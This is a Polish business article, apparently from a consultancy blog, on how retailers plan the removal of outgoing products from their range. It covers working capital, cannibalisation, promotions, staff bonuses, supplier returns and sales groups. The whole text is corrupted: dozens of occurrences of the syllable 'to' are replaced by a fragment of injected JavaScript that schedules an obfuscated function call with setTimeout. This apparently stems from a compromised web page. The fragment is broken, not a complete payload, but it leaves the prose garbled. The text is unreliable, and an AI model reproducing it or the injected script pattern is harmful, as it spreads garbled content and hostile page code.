In Artykuły, Handel, Uniwersalne

W każdej firmie z czasem zmienia się oferta. Ten proces oczywiście składa się z dość miłej części w postaci wprowadzania nowych produktów. Oraz z mniej przyjemnej, trudniejszej i nie przysparzającej laurów części w postaci pozbywania się niektórych produktów. Części dość częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w ogóle zapominanej, a rzadko planowanej, szczególnie z wyprzedzeniem.

Jak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zwykle wygląda? Do starej oferty dodawane są nowe produkty, a stare jakoś się z czasem wyprzedadzą.

W efekcie oferta puchnie. Obok nowości pozostają stare produkty, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już niekompletne, uszkodzone, a na pewno przestarzałe. Nie wygląda dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dobrze. I niezbyt dobrze się sprzedaje.

Oferta dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie zapas

Ale czasem nie musi dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to być problemem, szczególnie wtedy, gdy firma sprzedaje produkty niematerialne lub faktycznie niematerialne (czyli ze wzorów). Wtedy wystarczy zmienić dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to co się

Uwaga. „asortyment dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to samo co zapas”. A wiele firm u dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tożsamia te dwa słowa. Można sprzedawać produkty, których nie ma się na zapasie, ale jak najbardziej ma w ofercie. Takie produkty są zwykle dużo trudniejsze w sprzedaży (trzeba przekonać do czegoś, na co trzeba poczekać), ale też one potrafią się zrewanżować. Najbardziej w postaci mniejszego zaangażowania kapitału obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego, ale też w postaci dużo łatwiejszego i tańszego pozbywania się ich z oferty.

Czy produkty niematerialne (oraz niedostępne od razu) muszą sprzedawać się gorzej niż te, które są od ręki? W większości przypadków tak właśnie jest. Ale za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to koszt pozbycia się starego dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru może czasem skompensować tę niedogodność.

Jeśli jednak produkt znajduje się w zapasie, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmieniając ofertę trzeba się go aktywnie pozbyć. To niemiła konieczność, którą tylko nieliczne potrafią wykonać niewielkim kosztem.

A po co się pozbywać?

A może szkoda kłopotu? Może stary dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar lepiej pozostawić w spokoju, czekając aż się wyprzeda w naturalny sposób? Może. I wiele firm tak robi. Ale się w ten sposób wiele straci, choć mało k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to liczy.

Uwaga. „dlaczego firma może chcieć się pozbyć produktu?” Powodów może być wiele. Może dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to być koniec jego cyklu życia, może być zmiana oferty u dostawcy, może też być zmiana własnej strategii struktury Grupy Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej.

O dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to typowe koszty pozostawienia w ofercie starego dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru. Tak długo, aż się wyprzeda. I w nadziej, że zrobi dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sam.

Zamrożony kapitał. Jeśli policzyć zamrożoną w nim gotówkę, która przecież przydałaby się gdzie indziej, np. na rozwój czy właśnie na nowe produkty, odpowiedź jest oczywista. Tak jednak myśli niewielu sprzedawców, przede wszystkim tych, których dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar z natury rzeczy jest sezonowy, jak ma dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to miejsce w przypadku mody. Ci rozumieją kwestię zamrożonego kapitału obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego i jego alternatywne wykorzystanie.

Uwaga. „wciskanie przez dostawców”. Problem outgoing częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tworzą sami dostawcy. Oni wiedzą najwcześniej, co będzie outgoing (jeśli dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ich decyzja). I mogliby z góry o tym poinformować odbiorców, dzieląc się z nimi problemem. Częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ukrywają, co już utrudnia odbiorcom planowanie, a częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wręcz sami tworzą kłopot. Oferują mianowicie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar z dużym dyskontem, w nadziei, że odbiorca dużo zamówi. Oni pozbędą się kłopotu, a on jakoś sobie przecież poradzi. Może i poradzi, ale skanlibalizuje regularną sprzedaż i zapcha półki oraz kapitał obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towy.

Miejsce na półce. Stare produkty zajmują nowym miejsce nie tylko w kapitale obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towym. Zajmują im także miejsce na półce, ale i w sercach pracowników. Ci, zamiast lansować i polecać nowe, starają się pozbyć kłopotu.

Uwaga. „pozbyć się kłopotu”. Kłopot jest bardziej bolesny niż utracona szansa. On jest, namacalny i odczuwalny, a szansa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to coś wirtualnego i niewymiernego. Dlatego pracownicy, zamiast maksymalizować sprzedaż nowych produktów, przede wszystkim koncentrują się na pozbyciu się tego, co im zalega. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z punktu widzenia zarządzania magiczną formułą duża strata. Na dobrej sprzedaży pełnowar dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tościowego produktu o dużej rotacji w krótkim czasie zarobi się tyle, że stary produkt lepiej wyrzucić. Tymczasem dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to on jest lansowany, tylko po dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby się go pozbyć z jak najmniejszą stratą.

Lepiej spalić. Porównajmy dwa scenariusze. W pierwszym firma stara się pozbyć starego dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru przez niezbyt dużą przecenę (aby nie stracić na marży).

Drugi scenariusz zakłada, że dobre miejsce zostanie wykorzystane na pokazanie nowości, a outgoing wyprzedany w słabym miejscu, ale z bardzo niską ceną. Tak, aby się wyprzedał mimo złego miejsca. Dobre miejsce zwiększy sprzedaż nowości, zwykle jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to 2-3 razy.

W drugim scenariuszu, mimo głębokiej przeceny na outgoing, firma zarobiła więcej. Z tego punktu widzenia outgoing lepiej spalić, niż się nim zajmować.

Nawet jednak jeśli kapitał obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towy nie jest problemem, gdyż np. firma jest zamożna i generuje gotówkę albo wynegocjowała z dostawcami długie terminy płatności, przez co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to oni finansują zapas, na półce wystarcza miejsca dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to i tak chaos w ofercie, wywołany brakiem zarządzania produktami outgoing, ma ujemny wpływ na sprzedaż. Przede wszystkim przez chaos w przekazie do klienta oraz przez utrudnione zarządzanie magiczną formułą sprzedaży (głównie kanibalizacja, utrudniony up-sell i cross-sell).

A jak chaos w ofercie przejawia się w praktyce? Czy rzeczywiście firma z tego tytułu traci, i dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko na kapitale obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towym? Traci, przede wszystkim w sprzedaży. Mianowicie jej magiczna formuła sprzedaży przestaje być zarządzana, a zaczyna zarządzać się sama, niestety zwykle ze szkodą dla ostatecznego wyniku.

Jak wpływa na sprzedaż chaos w ofercie? Wpływa na wszystkie elementy magicznej formuły sprzedaży. Zacząć trzeba od tego, że wpływa na odwiedzalność (przez brak spójnego komunikatu do klienta).

Kanibalizacja. Stare produkty sprzedają się zamiast nowych. Są lepiej wystawione (przecież firma chce je wyprzedać), mają też lepszą cenę.

Zaburzony up-sell. Stare produkty dublują pozycje w drabince cenowej, w dodatku zaburzają jej logikę w postaci obniżonych cen (w proporcji do swoich cech). Drabinka przestaje działać, a przynajmniej w zamierzony sposób. Przestaje sterować klientem w kierunku produktów droższych, w myśl zasady „dużo lepszy, a niewiele droższy”. Efekt up-sell staje się przypadkowy i

Utrudniony cross-sell. Stare produkty wymagają starych akcesoriów. Których już nie ma, a jeśli są, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w niepełnym wyborze. Tym samym ucieka szansa dodatkowej sprzedaży, ale też firma daje sygnał swoim pracownikom, że można nie dodawać akcesoriów. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to duża strata.

Zaburzony komunikat do klienta. Oferta dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko sprzedaż. To także komunikat do klienta. O tym, jaki dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Koncept Sprzedażowy, czy war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tu przychodzić i po co. Produkty outgoing zaburzają ten obraz. Pokazują przestarzałe produkty w przypadkowy sposób. Ze sprzedawcy z ofertą firma staje się bazarem z przecenami. To nic złego i do pewnego s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topnia każdy klient nawet dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to lubi. Ale nie można przesadzić, gdyż dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już zaburzy komunikat.

Dlatego lepszym wyjściem, tak dla kapitału obro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego, jak i dla zarzadzania magiczną formułą sprzedaży jest zapanowanie nad ofertą. Czyli pozbycie się produktów outgoing, jak najszybciej, i dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nawet znacznym kosztem. Ten koszt i tak zostanie zniwelowany dobrą sprzedażą nowości, up-sell, cross-sell i innymi składnikami zarządzania magiczną formułą sprzedaży. A do tego niezbędna jest przemyślana i starannie wdrożona procedura outgoing.

Procedura outgoing

Najlepszym sposobem, aby pozbyć się starej części zapasu jest procedura. Wtedy chaotyczne działanie zamienia się w plan. A plan w niższe koszty i większą skuteczność.

Jak pozbyć się outgoing? Są na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to rozmaite sposoby. Najłatwiejsza jest wyprzedaż, najtańsze zarządzanie logistyką.

Wstrzymanie zamówień. Najlepszym i najtańszym sposobem na pozbycie się niechcianych produktów jest odpowiednio wczesne wstrzymanie zamawiania. A szerzej rzecz ujmując, dopasowanie procedury zamawiania nie do przeszłości, ale do przewidywanej przyszłości. Najlepiej przez dopasowanie parametrów logistycznych, takich jak oczekiwana sprzedaż czy pożądany poziom dostępności (dana wyjściowa do określenia poziomu zapasu bezpieczeństwa).

Uwaga. „najgorzej sprzedają się ostatnie sztuki”. Ta zasada niestety jak najbardziej obowiązuje produkty wychodzące z oferty. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zasada bardzo bolesna (dla wyniku firmy). Choćby dlatego, że są zniszczone, uszkodzone czy niekompletne. Ale też dlatego, że jest przecież jakiś powód, że te produkty są wycofywane. Stały się niemodne, przestarzałe czy tylko zastąpione przez inne, nowsze.

Promocja. Czy każda promocja oznacza obniżkę ceny? Nie każda i nie przede wszystkim. Nawet jeśli rozszerzyć definicję obniżki na każdy rodzaj wymiernej w pieniądzach korzyści dla klienta, jak 3 za 2, dodatkowy produkt czy inny rodzaj prezentu.

Promocja oznacza w szczególności aktywne zarządzanie ofertą (czyli usytuowaniem produktu w drabince cenowej, ale bez zmiany jego ceny, przez poszerzenie drabinki w jakimś zakresie). Może dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też być zarządzanie przestrzenią (czyli wykorzystanie miejsc o dużej intensywności ruchu do eksponowania produktu, bez zmiany jego ceny). To także wykorzystanie pracowników do polecania produktu. Tu też nie trzeba obniżać ceny, choć na pewno war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wyposażyć sprzedawców w argumenty, które mogą przekonać klienta.

Przecena. To szczególny rodzaj promocji, takiej z wyraźną i wymierną korzyścią dla klienta. Do takich promocji produkty outgoing nadają się idealnie.

Uwaga. „na promocji cenowej rzadko da się zarobić”. To znaczy, dostawca zarobi prawie zawsze. Jednak jego interes polega na zabraniu sprzedaży innemu dostawcy. Jemu nie zależy, żeby tej sprzedaży było w sumie więcej. Tylko żeby jego sprzedało się lepiej.

Jednak firmy robią promocję. Z jednej strony czują nacisk dostawców, którzy chcą wyróżnić swoją markę (promocja cenowa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dobry na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sposób). Chcą też zabrać sprzedaż innym dostawcom. Promocji cenowych oczekują też klienci, których do nich przyzwyczaili sprzedawcy. Więc promocje trzeba robić. Ale skoro już trzeba, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najlepiej wykorzystać do nich produkty, których nie szkoda. A strata nie będzie zbyt bolesna, gdyż jakoś przecież trzeba się ich pozbyć.

Uwaga. „jak działa kanibalizacja?” Niezauważalnie. Firmy zwykle śledzą losy produktów, na których się koncentrują. Jeśli np. chcą coś wyprzedać, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sprawdzają sprzedaż. Ale rzadko śledzą losy tego, na co ta sprzedaż może mieć wpływ, np. produktu obok.

Zarządzanie pracownikami. Pracownicy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kluczowy element zarządzania magiczną formułą sprzedaży. Ich też jak najbardziej można wykorzystać do procedury outgoing. Można np. przeznaczyć dodatkowe wynagrodzenie za sprzedaż wyznaczonego dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru. Musi go jednak znać, produkt powinien być oznakowany w widoczny dla niego sposób. A nagroda powinna być na tyle duża, aby zachęcić go do działania. Ale jeśli dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się uda, skutek powinien być odczuwalny.

Uwaga. „pracownikom łatwiej zakomunikować”. Można im też mniej zapłacić (w formie bonusu) niż klien dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi (w formie przeceny). Tajemnica skuteczności wykorzystania pracowników do wyprzedaży sprowadza się do tego, że jest ich mniej niż klientów. Za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to oni sprzedają wiele sztuk tego samego (co kumuluje mały bonus do dużej kwoty), a klient kupuje pojedynczą.

Także komunikacja z pracownikami jest znacznie ułatwiona porównując do komunikacji z klientem. Komunikat do klienta o wychodzeniu produktu z oferty jest utrudniony. Sprowadza się zwykle do przeceny. Tymczasem komunikacja z pracownikiem jest łatwa, wystarczy mu powiedzieć, wyprzedawaj ten produkt.

Pracownikowi można też mniej zapłacić. On sprzedaje wiele produktów i dopiero ich suma (i suma związanych z nimi bonusów) stanowi o dodatkowym wynagrodzeniu. Zaś klient kupuje tylko jeden produkt i dlatego przecena i jego korzyść musi być znaczna, gdyż jest jednorazowa.

Za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to siła oddziaływania pracownika na klienta przełoży się na sprzedaż produktu wyprzedażowego bez konieczności przeceny. A klient, żeby podjął sam decyzję wymaga głębokiej przeceny, czasem dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to 30%, ale czasem wręczy 70% i więcej.

Wymiana. Albo zwrot do dostawcy. To dobry sposób, jednak dlaczego dostawca miałby zaakcep dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować wymianę produktów outgoing? Przecież sam chce się pozbyć tego produktu, a dystrybu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor jest do tego najlepszym narzędziem? Jest kilka powodów.

Marketing. Dla dostawcy wymiana dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to koszt marketingowy, inaczej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to koszt lansowania nowego produktu. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to praktycznie nie ma ceny i zawsze się opłaca. Jeśli dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się tak mu przedstawi, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to chętnie wymieni staroć.

Udrożnienie kanału. To ma dla dostawcy war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość nieocenioną, ale rzadko docenianą. Sprzedawca, który ma na półkach stare produkty, przestaje sprzedawać, przede wszystkim dlatego, że powoli przestają go odwiedzać zniechęceni klienci. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to prędzej czy później musi odbić się i na dostawcy.

Alternatywne kanały dystrybucji. Dostawca częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ma dostęp do alternatywnych kanałów dystrybucji, które wręcz specjalizują się w wyprzedażach. Sami przecież mają problemy z outgoing. I potrafią ten produkt ulokować w wyspecjalizowanym koncepcie, co znacznie obniża koszty wyprzedaży.

Uwaga. „outlet”. Niektórzy sprzedawcy tworzą specjalne placówki do wyprzedaży. To tzw. outlety. Czy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dobry pomysł? Co do zasady, dobry, pod warunkiem jednak, że dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sytuacja wyjątkowa. Tymczasem pomysł się rozrasta i zamiast zarządzać outgoing (co jest trudne i uciążliwe) , firma tworzy sieć outletów (co wydaje się łatwym rozwiązaniem). A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już inny Model Biznesowy i zwykle zły pomysł.

Sterowanie Konceptem odbiorcy. Takie sterowanie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to łakomy kąsek dla dostawcy, odbiorca ponosi koszty funkcjonowania Modelu Biznesowego i w szczególności działania magicznej formuły, a dostawca tylko czerpie z tego korzyści. Do takiego sterowania można wykorzystać prawo zwrotu, na zasadzie „w zamian za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to”. I postawić warunki, np. shop-in-shop czy własne zasady merchandisingu, prze dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarowanie w nowy produkt itd.

Wymiana nie mus być faktyczna. Czasem wystarczy otrzymać od dostawcy rekompensatę do kosztów wyprzedaży. Wtedy oszczędza się na kosztach logistyki, a nadal można przeprowadzić procedurę outgoing wg najlepszego możliwego schematu.

Centralnie czy lokalnie?

Czy wiedzę o outgoing Centrala firmy powinna zachować dla siebie? Przecież jeśli ta informacja się rozpowszechni, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nikt nie będzie chciał sprzedawać tych produktów. W końcu trudno będzie np. załatwić reklamację, wymianę czy dopasować produkty komplementarne.

Jednak war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to postarać się o współpracę jednostek liniowych. Bez ich pomocy będzie trudno pozbyć się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru, pozostanie też cień nieufności na przyszłość. Lepiej się przyznać i na tym budować zaufanie. Choć niekoniecznie wspólny interes.

Uwaga. „liczy się zaufanie”. Interes Centrali (działu Handlowego, czyli zarządzającego asortymentem, w szczególności) zwykle jest częściowo sprzeczny z interesem jednostek liniowych. To z jednej strony efekt perspektywy (placówki są blisko, widzą wiele szczegółów, ale nie mają pełnego obrazu). Ale też faktu, że dział Handlowy zwykle częściowo reprezentuje interes dostawców (tak jak dział sprzedaży interes klienta końcowego), i w efekcie stara się pogodzić ich interes z interesem firmy.

Te sprzeczności są naturalne i nie ma co się nimi specjalnie przejmować. Ale w przypadku zarządzania dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarami wychodzącymi z oferty tak sprzeczność ujawnia się w pełnym zakresie. Można ją wyeliminować (i przekuć w sukces) jeśli zamiast walczyć, sprzeczności zostaną uświadomione, zaakcep dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towane i uwzględnione. To jednak zakłada nie tyle wspólnotę interesów, ile wzajemne zaufanie, przy ich różnicach.

Mimo ogólnej sprzeczności interesów, akurat w przypadku outgoing da się znaleźć ich część wspólną. Przecież, jeśli firma nie pozbędzie się produktów wychodzących z oferty w uporządkowany sposób, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to i tak prędzej czy później trafią one do placówek. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to one na końcu będą musiały jakoś się ich pozbyć (w przeciwnym przypadku pozostaje złomowanie).

Kluczem jest planowanie

W procedurze outgoing najtrudniejsze wcale nie jest pozbycie się niechcianego dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru. To jest dość proste, szczególnie jeśli odpowiednio wcześnie zmniejszy się zamówienia czy wykorzysta produkty wychodzące z oferty do promocji. Najtrudniejsze jest planowanie. W procedurze outgoing trzeba bowiem zaplanować z góry działanie, a następnie konsekwentnie się tego trzymać.

To jaką procedurę outgoing zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować, nie zależy tylko od możliwości i przewidywania. Zależy także od tego, jaki dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to produkt. Czyli czy jest go dużo czy mało, a także od tego, w jakiej Grupie Sprzedażowej się znajduje.

Struktura zapasu

Klienci oceniają jakość oferty firmy w postaci zaklasyfikowania jej w co najmniej 4 Grupy Sprzedażowe. War dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pamiętać, że dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to decyzja klientów. Można na nią wpływać, ale tylko w ograniczonym zakresie.

Uwaga. „C i D też są potrzebne”. I nie należy próbować się ich pozbyć. Takie działanie będzie kosz dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towne, a i tak nie będzie skuteczne.

Ten podział (i struktura) mają fundamentalne znaczenie dla trudności i sposobu pozbycia się produktu z oferty.

Procedura outgoing a Grupy Sprzedażowe

Produkt, którego chce się pozbyć z oferty, może należeć do każdej Grupy Sprzedażowej. Oczywiście najczęściej firma chce się pozbyć produktów D, ale zarówno A, jak i B mogą też być źródłem produktów outgoing.

Grupa A. Tu jest łatwo. Wystarczy ograniczyć zamawianie, przez dopasowanie parametrów logistycznych do przewidywań (czyli s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniowo coraz gorszej sprzedaży). Takie produkty doskonale nadają się na promocje, choć zwykle nie będą one potrzebne. Wystarczy wstrzymać zamawianie i poczekać. Także obniżka ceny bardzo im pomoże, jeśli jednak będzie potrzebna. Zarówno jednak promocja czy przecena dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to raczej błąd w sztuce. Tu bowiem prawdziwe ryzyko sprowadza się głównie do zbyt późnego wstrzymania zamówień czy niedopasowanie parametrów logistycznych.

Grupa B. I tu jest łatwo, choć trudniej niż w A. Sprzedaż jest mniejsza, a wymienność z produktami, które zastąpiły outgoing bardzo duża. Mało k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to będzie więc chciał je kupić, nawet jeśli zostaną przecenione. Najlepiej znów odpowiednio wcześnie wstrzymać zamawianie, ale bez promocji i przecen też się raczej nie obejdzie.

Grupa C. Tu będzie trudno. Sprzedaż jest i tak słaba. Paradoksalnie najlepszym sposobem jest zadbanie (wcześniejsze) aby zapas w tej Grupie nie był wysoki. A jeśli tak będzie, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wystarczy poczekać. I potrak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować C jako teatr, wspomagający sprzedaż Grupy A i B.

Grupa D. To Grupa, która i tak się nie sprzedaje. A skoro tak, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jak się jej pozbyć? Przede wszystkim dociec, dlaczego się nie sprzedaje. Gdyż produkt nie staje się D ot tak sobie, zawsze jest jakiś powód. A skoro tak, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to teraz trzeba go poznać i usunąć. Wcześniej brak sprzedaży nie przeszkadzał, tło i teatr zawsze są potrzebne, bez nich A i B by się nie sprzedawały.

Teraz jednak outgoing D staje się już nie tyle tłem, co balastem. I przyszedł czas, aby się go pozbyć. Przestają bowiem wspierać sprzedaż (przez stworzenie wrażenia wyboru), a raczej zniechęcają do odwiedzin, przez swój przestarzały charakter.

Podsumowanie

Asortyment się zmienia. W każdej firmie. A nie każda pamięta, że dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko wprowadzanie nowych produktów, ale konieczność pozbywania się starych. Najlepiej robić dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w uporządkowany sposób, wtedy będzie taniej, a bardzo skutecznie. Taki uporządkowany sposób można nazwać procedurą „outgoing”.

a

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.